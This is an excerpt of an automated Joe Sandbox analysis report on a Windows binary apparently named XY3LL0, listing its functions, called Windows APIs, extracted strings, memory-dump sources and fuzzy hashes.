Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

l, xrefs: 0000000140005F82
r, xrefs: 0000000140005F6E
M, xrefs: 0000000140005EA9
d, xrefs: 0000000140005F7D
t, xrefs: 0000000140005F73
a, xrefs: 0000000140005EE9
m, xrefs: 0000000140005F91
l, xrefs: 0000000140005F87
l, xrefs: 0000000140005FA0
M, xrefs: 0000000140005E99
a, xrefs: 0000000140005F96
t, xrefs: 0000000140005ED1
v, xrefs: 0000000140005F64
l, xrefs: 0000000140005F9B
s, xrefs: 0000000140005F5F
d, xrefs: 0000000140005EE1
., xrefs: 0000000140005ED9
m, xrefs: 0000000140005F5A
L, xrefs: 0000000140005EB9
t, xrefs: 0000000140005EF1
., xrefs: 0000000140005F78
c, xrefs: 0000000140005F69
p, xrefs: 0000000140005EB1
s, xrefs: 0000000140005EC9
i, xrefs: 0000000140005EC1
s, xrefs: 0000000140005EA1
c, xrefs: 0000000140005FAA
o, xrefs: 0000000140005FA5

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FF8FDF91C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8FDF91C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8FDF91C7A
_RTC_Initialize.LIBCMT ref: 00007FF8FDF91CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8FDF91CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FF8FDF91CF9

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: 239d2e2aa0e5f630afd95da0c49e829a99bfce3161277890afd3d4d57cdb7100
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: FC819123E082434EFB54AB169C41AB92290EF657E0F844435DB6F877D6FE3CE5468682

Function 00007FF8FDF91720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FF8FDF91753
FreeLibrary.KERNEL32 ref: 00007FF8FDF91981

Part of subcall function 00007FF8FDF91B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8FDF91BC0
Part of subcall function 00007FF8FDF91B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8FDF91BC6

Part of subcall function 00007FF8FDF91720: FindFirstFileA.KERNELBASE ref: 00007FF8FDF91536

Strings

WordpadFilter.db, xrefs: 00007FF8FDF91527

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 4b4dee100fb1953de896b3187e264eee163c28022e0da20e7180210532b76672
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: C6316B33F15B4189E700CFA1D8406AD73A5EBA8798F148535EF5E13B88EE38D551C380

Function 00007FF8FDF911B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8FDF914EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8FDF914F7

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 27dd268e295c703b1fe319ae2d46ec32b63cb3f2cd0345d4957c486775d7e7cc
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: BD814923E1978249E7118B3598005B9A694EF6ABE4F148335EF6A577D6FF3CE0928340

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

null, xrefs: 0000000140003FCE
ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5
SeLoadDriverPrivilege, xrefs: 000000014000402A

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/remove, xrefs: 000000014000157E
vseamps, xrefs: 0000000140001538
/service, xrefs: 000000014000153F

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

MessageBoxA, xrefs: 000000014000F054
GetUserObjectInformationA, xrefs: 000000014000F0E9
GetProcessWindowStation, xrefs: 000000014000F10D
USER32.DLL, xrefs: 000000014000F03B
GetActiveWindow, xrefs: 000000014000F075
GetLastActivePopup, xrefs: 000000014000F094

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

<program name unknown>, xrefs: 00000001400093D9
..., xrefs: 0000000140009431
Runtime Error!Program: , xrefs: 000000014000938D
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
